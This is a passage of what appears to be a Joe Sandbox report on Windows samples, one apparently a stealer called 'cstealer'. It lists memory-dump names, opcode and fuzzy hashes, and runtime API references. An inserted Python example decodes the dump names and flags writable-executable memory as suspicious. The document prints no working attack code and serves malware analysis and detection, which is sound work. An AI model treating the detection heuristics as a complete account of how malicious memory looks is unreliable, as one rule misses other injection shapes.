• Associated: 00000008.00000002.2223968322.00007FF8BA251000.00000002.00000001.01000000.0000001B.sdmp
• Associated: 00000008.00000002.2224191632.00007FF8BA256000.00000004.00000001.01000000.0000001B.sdmp
• Associated: 00000008.00000002.2224695908.00007FF8BA257000.00000002.00000001.01000000.0000001B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_7ff8ba240000_main.jbxd
Similarity
• API ID: NameName::$Name::operator+
• String ID:
• API String ID: 826178784-0
• Opcode ID: e814d139e3419835f38085e6cc00be1678fdf65e944501138f1dd798dcc3f124
• Instruction ID: 64ab0c19d16cadb7820dbeba84a55cf4a002ba4624a9c8a6833745beddac54fe
• Opcode Fuzzy Hash: e814d139e3419835f38085e6cc00be1678fdf65e944501138f1dd798dcc3f124
• Instruction Fuzzy Hash: A1418B32A18B5794FB10CB2AD9901B837A4BB55FC0B9840B2EF5E17795EF39E845E300

APIs
  • Part of subcall function 00007FF8BA246960: abort.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,00007FF8BA2425AE), ref: 00007FF8BA24696E
• abort.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF8BA2443E7
Memory Dump Source
• Source File: 00000008.00000002.2223544157.00007FF8BA241000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF8BA240000, based on PE: true
• Associated: 00000008.00000002.2223330702.00007FF8BA240000.00000002.00000001.01000000.0000001B.sdmp
• Associated: 00000008.00000002.2223968322.00007FF8BA251000.00000002.00000001.01000000.0000001B.sdmp
• Associated: 00000008.00000002.2224191632.00007FF8BA256000.00000004.00000001.01000000.0000001B.sdmp
• Associated: 00000008.00000002.2224695908.00007FF8BA257000.00000002.00000001.01000000.0000001B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_7ff8ba240000_main.jbxd
Similarity
• API ID: abort
• String ID: $csm$csm
• API String ID: 4206212132-1512788406
• Opcode ID: bb1235440ca836f75756ab82136ebef4cbca7055a8801f356a81cb2fbc572e69
• Instruction ID: 0fd6edcee69c39b493c1e22f464d1daa9d3ec07cc95e9a9ca08e100d9b847bb6
• Opcode Fuzzy Hash: bb1235440ca836f75756ab82136ebef4cbca7055a8801f356a81cb2fbc572e69
• Instruction Fuzzy Hash: 36718E7690869287DB648B29D0A06BDBBA0FB04FC9F148176DF4E47A89CF3CD591E740

Memory Dump Source
• Source File: 00000008.00000002.2223544157.00007FF8BA241000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF8BA240000, based on PE: true
• Associated: 00000008.00000002.2223330702.00007FF8BA240000.00000002.00000001.01000000.0000001B.sdmp
• Associated: 00000008.00000002.2223968322.00007FF8BA251000.00000002.00000001.01000000.0000001B.sdmp
• Associated: 00000008.00000002.2224191632.00007FF8BA256000.00000004.00000001.01000000.0000001B.sdmp
• Associated: 00000008.00000002.2224695908.00007FF8BA257000.00000002.00000001.01000000.0000001B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_7ff8ba240000_main.jbxd
Similarity
• API ID: CurrentImageNonwritableUnwind
• String ID: csm$f
• API String ID: 451473138-629598281
• Opcode ID: 1ee30452dd9abf8fa75946a47cbff7eb02a6352aece6e019df933011e3a9f475
• Instruction ID: e742aba4665c46cc517799a2da2d63eb042cf643fb22369d1138a49a11bde028
• Opcode Fuzzy Hash: 1ee30452dd9abf8fa75946a47cbff7eb02a6352aece6e019df933011e3a9f475
• Instruction Fuzzy Hash: 4C51CF32A1960386EB14CB19E444A693B95FBC4FC8F119075DF0A47B88EF79ED49D700

APIs
  • Part of subcall function 00007FF8BA246960: abort.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,00007FF8BA2425AE), ref: 00007FF8BA24696E
• abort.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF8BA244137
• __FrameHandler3::FrameUnwindToEmptyState.LIBVCRUNTIME ref: 00007FF8BA244147
Memory Dump Source
• Source File: 00000008.00000002.2223544157.00007FF8BA241000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF8BA240000, based on PE: true
• Associated: 00000008.00000002.2223330702.00007FF8BA240000.00000002.00000001.01000000.0000001B.sdmp
• Associated: 00000008.00000002.2223968322.00007FF8BA251000.00000002.00000001.01000000.0000001B.sdmp
• Associated: 00000008.00000002.2224191632.00007FF8BA256000.00000004.00000001.01000000.0000001B.sdmp
• Associated: 00000008.00000002.2224695908.00007FF8BA257000.00000002.00000001.01000000.0000001B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_7ff8ba240000_main.jbxd
Similarity
• API ID: Frameabort$EmptyHandler3::StateUnwind
• String ID: csm$csm
• API String ID: 4108983575-3733052814
• Opcode ID: 11c4ce4d55e2cf51e2b9c0d4075d348971100c6bb06491b44300c400f97ac44e
• Instruction ID: 0848efb5bd209338e2106aca621ede95f5623d8ebc6ca767cb640a57508fbd9a
• Opcode Fuzzy Hash: 11c4ce4d55e2cf51e2b9c0d4075d348971100c6bb06491b44300c400f97ac44e
• Instruction Fuzzy Hash: 6D517B3690868387EF648B19945426876A0FB51FC8F1482B6DF9C47BD5CF3CE460EB00
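The .sdmp names in the "Memory Dump Source" entries above encode, for each dumped region of the module at 00007FF8BA240000, where the region sits and how it was protected. The Python below is an example added by the editor, not Joe Sandbox's own tooling: it splits an .sdmp name into its dot-separated fields, decodes the protection and type fields with the Windows PAGE_* and MEM_* constants from winnt.h, and rebuilds the region layout from the Source File and Associated names listed on this page. The field order it assumes (pid, stage, dump id, address, protection, flags, type, index) is my reading of the names in this listing, not a documented format, and the final "injected" region name is constructed purely to show the W^X check firing.

```python
"""Decode Joe Sandbox-style .sdmp memory-dump names into a module layout.

Editor's example, not Joe Sandbox code. Field order below is an assumption
inferred from the names in the report listing; the protection and type
values are decoded with the Windows winnt.h constants.
"""
from dataclasses import dataclass

# winnt.h page-protection constants (low byte of the protection value)
PAGE_PROTECT = {
    0x01: "PAGE_NOACCESS", 0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE",
    0x08: "PAGE_WRITECOPY", 0x10: "PAGE_EXECUTE", 0x20: "PAGE_EXECUTE_READ",
    0x40: "PAGE_EXECUTE_READWRITE", 0x80: "PAGE_EXECUTE_WRITECOPY",
}
EXEC_MASK = 0x10 | 0x20 | 0x40 | 0x80          # any executable protection
WRITE_EXEC_MASK = 0x40 | 0x80                  # executable and writable
# winnt.h memory-type constants as returned in MEMORY_BASIC_INFORMATION.Type
MEM_TYPE = {0x20000: "MEM_PRIVATE", 0x40000: "MEM_MAPPED", 0x1000000: "MEM_IMAGE"}


@dataclass(frozen=True)
class DumpRegion:
    pid: int
    stage: int
    dump_id: int
    address: int
    protect: int
    flags: int        # meaning of this field is not known; kept verbatim
    mem_type: int
    index: int

    @property
    def protect_name(self) -> str:
        return PAGE_PROTECT.get(self.protect & 0xFF, f"0x{self.protect:X}")

    @property
    def type_name(self) -> str:
        return MEM_TYPE.get(self.mem_type, f"0x{self.mem_type:X}")


def parse_sdmp_name(name: str) -> DumpRegion:
    """Split '<pid>.<stage>.<id>.<addr>.<prot>.<flags>.<type>.<index>.sdmp'.

    Assumption: the first three fields are decimal counters, the rest hex.
    """
    stem = name[:-5] if name.endswith(".sdmp") else name
    parts = stem.split(".")
    if len(parts) != 8:
        raise ValueError(f"unexpected .sdmp name layout: {name}")
    pid, stage, dump_id = (int(p, 10) for p in parts[:3])
    address, protect, flags, mem_type, index = (int(p, 16) for p in parts[3:])
    return DumpRegion(pid, stage, dump_id, address, protect, flags, mem_type, index)


def is_suspicious(region: DumpRegion) -> bool:
    """Flag writable+executable memory, or executable memory that is not a
    mapped image: the usual shape of injected or manually mapped code."""
    if region.protect & WRITE_EXEC_MASK:
        return True
    return bool(region.protect & EXEC_MASK) and region.mem_type != 0x1000000


def module_layout(names, base: int):
    """Return (offset_from_base, protection, type) per region, sorted by
    address, after checking all dumps belong to one pid/stage/module index."""
    regions = sorted((parse_sdmp_name(n) for n in names), key=lambda r: r.address)
    owners = {(r.pid, r.stage, r.index) for r in regions}
    if len(owners) != 1:
        raise ValueError(f"dumps span several modules/processes: {owners}")
    return [(r.address - base, r.protect_name, r.type_name) for r in regions]


# The five dump names from this report's Memory Dump Source entries.
REPORT_DUMPS = [
    "00000008.00000002.2223544157.00007FF8BA241000.00000020.00000001.01000000.0000001B.sdmp",
    "00000008.00000002.2223330702.00007FF8BA240000.00000002.00000001.01000000.0000001B.sdmp",
    "00000008.00000002.2223968322.00007FF8BA251000.00000002.00000001.01000000.0000001B.sdmp",
    "00000008.00000002.2224191632.00007FF8BA256000.00000004.00000001.01000000.0000001B.sdmp",
    "00000008.00000002.2224695908.00007FF8BA257000.00000002.00000001.01000000.0000001B.sdmp",
]
MODULE_BASE = 0x7FF8BA240000
# Constructed name (not from the report): a private RWX region, as an
# injected-shellcode dump would appear under the same naming scheme.
INJECTED_DUMP = "00000008.00000002.2225000000.000001D2A3B40000.00000040.00000001.00020000.0000001C.sdmp"

if __name__ == "__main__":
    for off, prot, kind in module_layout(REPORT_DUMPS, MODULE_BASE):
        print(f"+0x{off:05X}  {prot:<22} {kind}")
    print("injected region suspicious:", is_suspicious(parse_sdmp_name(INJECTED_DUMP)))
```

Run stand-alone, the script lists the image regions at +0x0, +0x1000, +0x11000, +0x16000 and +0x17000 with their protections (the +0x1000 region is the only executable one), and reports the constructed RWX private region as suspicious.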
                                                                                                                                                            APIs
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000008.00000002.2223544157.00007FF8BA241000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF8BA240000, based on PE: true
                                                                                                                                                            • Associated: 00000008.00000002.2223330702.00007FF8BA240000.00000002.00000001.01000000.0000001B.sdmp
                                                                                                                                                            • Associated: 00000008.00000002.2223968322.00007FF8BA251000.00000002.00000001.01000000.0000001B.sdmp
                                                                                                                                                            • Associated: 00000008.00000002.2224191632.00007FF8BA256000.00000004.00000001.01000000.0000001B.sdmp
                                                                                                                                                            • Associated: 00000008.00000002.2224695908.00007FF8BA257000.00000002.00000001.01000000.0000001B.sdmp
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_8_2_7ff8ba240000_main.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: NameName::
                                                                                                                                                            • String ID: %lf
                                                                                                                                                            • API String ID: 1333004437-2891890143
                                                                                                                                                            APIs
                                                                                                                                                              • Part of subcall function 00007FF8BA246960: abort.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,00007FF8BA2425AE), ref: 00007FF8BA24696E
                                                                                                                                                            • terminate.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF8BA24264E
                                                                                                                                                            Strings
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: abortterminate
                                                                                                                                                            • String ID: MOC$RCC$csm
                                                                                                                                                            • API String ID: 661698970-2671469338
                                                                                                                                                            APIs
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: Name::operator+
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 2943138195-0
                                                                                                                                                            APIs
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: Name::operator+$NameName::
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 168861036-0
                                                                                                                                                            APIs
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: Name::operator+$Replicator::operator[]
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 3863519203-0
                                                                                                                                                            APIs
                                                                                                                                                            Strings
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: abort$CreateFrameInfo
                                                                                                                                                            • String ID: csm
                                                                                                                                                            • API String ID: 2697087660-1018135373
                                                                                                                                                            APIs
                                                                                                                                                            Strings
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: Name::operator+
                                                                                                                                                            • String ID: void$void
                                                                                                                                                            • API String ID: 2943138195-3746155364
                                                                                                                                                            APIs
                                                                                                                                                            Strings
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: FileHeader$ExceptionRaise
                                                                                                                                                            • String ID: Access violation - no RTTI data!$Bad dynamic_cast!
                                                                                                                                                            • API String ID: 3685223789-3176238549
                                                                                                                                                            APIs
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000008.00000002.2223544157.00007FF8BA241000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF8BA240000, based on PE: true
                                                                                                                                                            • Associated: 00000008.00000002.2223330702.00007FF8BA240000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                            • Associated: 00000008.00000002.2223968322.00007FF8BA251000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                            • Associated: 00000008.00000002.2224191632.00007FF8BA256000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                            • Associated: 00000008.00000002.2224695908.00007FF8BA257000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_8_2_7ff8ba240000_main.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: ExceptionFileHeaderRaise
                                                                                                                                                            • String ID: csm
                                                                                                                                                            • API String ID: 2573137834-1018135373
                                                                                                                                                            • Opcode ID: 257028e53f9e10efd1155f819e75397fd5938a66b84860a4a40924c9f67aeeb9
                                                                                                                                                            • Instruction ID: 6db99bf556056079c98663b7d5d61b98cf4dc548bf334f92f9533a0a6f38dc28
                                                                                                                                                            • Opcode Fuzzy Hash: 257028e53f9e10efd1155f819e75397fd5938a66b84860a4a40924c9f67aeeb9
                                                                                                                                                            • Instruction Fuzzy Hash: D6113A32A08B8182EB208F29F54026977A5FB88FC4F184271EF8C07B68DF3DD5558B00
                                                                                                                                                            APIs
                                                                                                                                                              • Part of subcall function 00007FF8BA24EF20: _IsNonwritableInCurrentImage.LIBCMT ref: 00007FF8BA24EFE0
                                                                                                                                                              • Part of subcall function 00007FF8BA24EF20: RtlUnwindEx.KERNEL32(?,?,?,?,?,?,?,00007FF8BA24ECE5), ref: 00007FF8BA24F02F
                                                                                                                                                              • Part of subcall function 00007FF8BA246960: abort.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,00007FF8BA2425AE), ref: 00007FF8BA24696E
                                                                                                                                                            • terminate.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF8BA24ED0A
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000008.00000002.2223544157.00007FF8BA241000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF8BA240000, based on PE: true
                                                                                                                                                            • Associated: 00000008.00000002.2223330702.00007FF8BA240000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                            • Associated: 00000008.00000002.2223968322.00007FF8BA251000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                            • Associated: 00000008.00000002.2224191632.00007FF8BA256000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                            • Associated: 00000008.00000002.2224695908.00007FF8BA257000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_8_2_7ff8ba240000_main.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: CurrentImageNonwritableUnwindabortterminate
                                                                                                                                                            • String ID: csm$f
                                                                                                                                                            • API String ID: 4189928240-629598281
                                                                                                                                                            • Opcode ID: 4324f3b8dec270d7fe627d3bc1aa05acc39fc06cb4de1d1a3df777bc5be6cc49
                                                                                                                                                            • Instruction ID: 59e8023d17f18a2b236a49494f79f01f2b106d04766b20f0a22f8655f8297629
                                                                                                                                                            • Opcode Fuzzy Hash: 4324f3b8dec270d7fe627d3bc1aa05acc39fc06cb4de1d1a3df777bc5be6cc49
                                                                                                                                                            • Instruction Fuzzy Hash: A2E0E531C08B8780FB206B24B2801BC67A4EF0CFD0F2481B0DF8806247CE3CD5909201
                                                                                                                                                            APIs
                                                                                                                                                            • GetLastError.KERNEL32(?,?,?,00007FF8BA2467F9,?,?,?,?,00007FF8BA24FE12,?,?,?,?,?), ref: 00007FF8BA24699B
                                                                                                                                                            • SetLastError.KERNEL32(?,?,?,00007FF8BA2467F9,?,?,?,?,00007FF8BA24FE12,?,?,?,?,?), ref: 00007FF8BA246A24
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000008.00000002.2223544157.00007FF8BA241000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF8BA240000, based on PE: true
                                                                                                                                                            • Associated: 00000008.00000002.2223330702.00007FF8BA240000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                            • Associated: 00000008.00000002.2223968322.00007FF8BA251000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                            • Associated: 00000008.00000002.2224191632.00007FF8BA256000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                            • Associated: 00000008.00000002.2224695908.00007FF8BA257000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_8_2_7ff8ba240000_main.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: ErrorLast
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 1452528299-0
                                                                                                                                                            • Opcode ID: 3883b8b30aa71385c4c501ddc4c688998c66794e7e7598c1b5effdf663d03949
                                                                                                                                                            • Instruction ID: b40e51f291064a7db41fc6c3c4c37b28fb294e662c0f3b42d0fddbf84278b711
                                                                                                                                                            • Opcode Fuzzy Hash: 3883b8b30aa71385c4c501ddc4c688998c66794e7e7598c1b5effdf663d03949
                                                                                                                                                            • Instruction Fuzzy Hash: 65113320E1975381FA549B29AA141353691BF48BE0F5886B4DF6E077D5EE3DF441B600

Control-flow Graph
• Basic blocks 7ff8a7daf8d0 through 7ff8a7dafbfa, entry block calls GetSystemInfo (rendered graph and raw edge list omitted)

Memory Dump Source
• Source File: 00000009.00000002.2448454207.00007FF8A7DA1000.00000020.00000001.01000000.00000032.sdmp, Offset: 00007FF8A7DA0000, based on PE: true
• Associated: 00000009.00000002.2448267981.00007FF8A7DA0000.00000002.00000001.01000000.00000032.sdmp
• Associated: 00000009.00000002.2451739427.00007FF8A7ECA000.00000002.00000001.01000000.00000032.sdmp
• Associated: 00000009.00000002.2452369686.00007FF8A7EF7000.00000004.00000001.01000000.00000032.sdmp
• Associated: 00000009.00000002.2453130459.00007FF8A7EFC000.00000002.00000001.01000000.00000032.sdmp
• Associated: 00000009.00000002.2453130459.00007FF8A7F0A000.00000002.00000001.01000000.00000032.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_7ff8a7da0000_cstealer.jbxd
Similarity
• API ID: InfoSystem
• String ID:
• API String ID: 31276548-0
• Opcode ID: f9f7b25920dae3aac1161b1ec18df20630773ad87d50c89e9d98f821025bc521
• Instruction ID: 9f81acb6ce33da715c16a34941ef2ce12e574b797d398d6c9ffa013feda1b8ec
• Opcode Fuzzy Hash: f9f7b25920dae3aac1161b1ec18df20630773ad87d50c89e9d98f821025bc521
• Instruction Fuzzy Hash: 52A11771A0BB87A9FE648F55A81037C22A1FF44BC4F440675C96E47BA4DFBCE5A0E240